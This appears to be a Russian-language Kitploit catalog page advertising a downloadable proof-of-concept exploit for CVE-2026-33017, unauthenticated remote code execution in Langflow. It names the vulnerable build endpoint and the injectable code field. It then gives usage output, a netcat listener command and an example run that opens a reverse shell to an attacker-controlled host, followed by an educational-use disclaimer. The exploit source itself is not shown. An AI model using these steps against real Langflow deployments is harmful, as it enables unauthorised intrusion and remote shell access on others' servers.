Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-33017-Langflow-RCE — Эксплойт CVE-2026-33017 | от infrar3d | Kitploit
Инструменты/GitHubGitHub/industri4l-h3ll-xpl0it3rs/cve-2026-33017-langflow-rce
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеРазработка Полезной Нагрузки
GitHubindustri4l-h3ll-xpl0it3rs/cve-2026-33017-langflow-rce

CVE-2026-33017-Langflow-RCE

Эксплойт CVE-2026-33017 | от infrar3d

Репозиторий
1111 месяц назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-33017 - Уязвимость удалённого выполнения кода (RCE) в Langflow

xpl0ited by infrar3d

Этот proof-of-concept эксплойт нацелен на критическую уязвимость удалённого выполнения кода (RCE) в версиях Langflow до 1.9.0. Уязвимость позволяет неаутентифицированным злоумышленникам выполнять произвольные системные команды путём внедрения вредоносного Python-кода через конечную точку API построения потоков. Уязвимость существует в конечной точке /api/v1/build_public_tmp/{flow_id}/flow endpoint, которая ненадлежащим образом очищает пользовательский код в поле code шаблонов компонентов.

Использование:

root@kitploit:~
python3 CVE-2026-33017.py --help
usage: CVE-2026-33017.py [-h] -u URL -f FLOW -H HOST [-P PORT]

Langflow RCE Exploit

options:
  -h, --help       show this help message and exit
  -u, --url URL    Target base URL
  -f, --flow FLOW  Flow ID
  -H, --host HOST  Listener host for reverse shell
  -P, --port PORT  Listener port (default: 4444)
                                         

Пример:

Первый терминал (слушатель):

root@kitploit:~
nc -lvnp 4444

Второй терминал (эксплойт):

root@kitploit:~
python3 CVE-2026-33017.py --url https://fireflowservice.example --flow abcd1234-efgh-5678-ijkl-9012mnop --host 10.10.10.10 --port 4444 

⚠️ Отказ от ответственности ⚠️

Данное программное обеспечение и proof-of-concept код предоставляются только в образовательных и исследовательских целях.

  • Авторы не несут ответственности за любое неправомерное использование или ущерб, причинённый данной программой.
  • Не используйте против любых систем без явного предварительного разрешения.
  • Использование этого инструмента для атаки на цели без согласия незаконно.

Вы несёте ответственность за соблюдение всех применимых законов. Используйте этично и ответственно.

Скачать инструмент